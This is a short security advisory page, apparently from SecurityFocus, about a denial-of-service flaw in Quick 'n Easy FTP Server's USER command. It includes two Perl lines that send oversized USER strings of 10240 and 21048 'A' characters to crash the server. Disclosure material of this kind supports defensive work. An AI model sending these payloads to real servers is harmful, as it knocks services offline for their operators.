Pablo Software Solutions Quick 'n Easy FTP Server User Command Denial of Service Vulnerability

A proof-of-concept exploit has been provided by matiteman.

It has been reported that the values in the proof of concept are incorrect. The correct overflow values should be:

print $socket "user " . "A" x 10240 . "\r\n";

print $socket "user " . "A" x 21048 . "\r\n";

The following exploit code is available:


 

Privacy Statement
Copyright 2010, SecurityFocus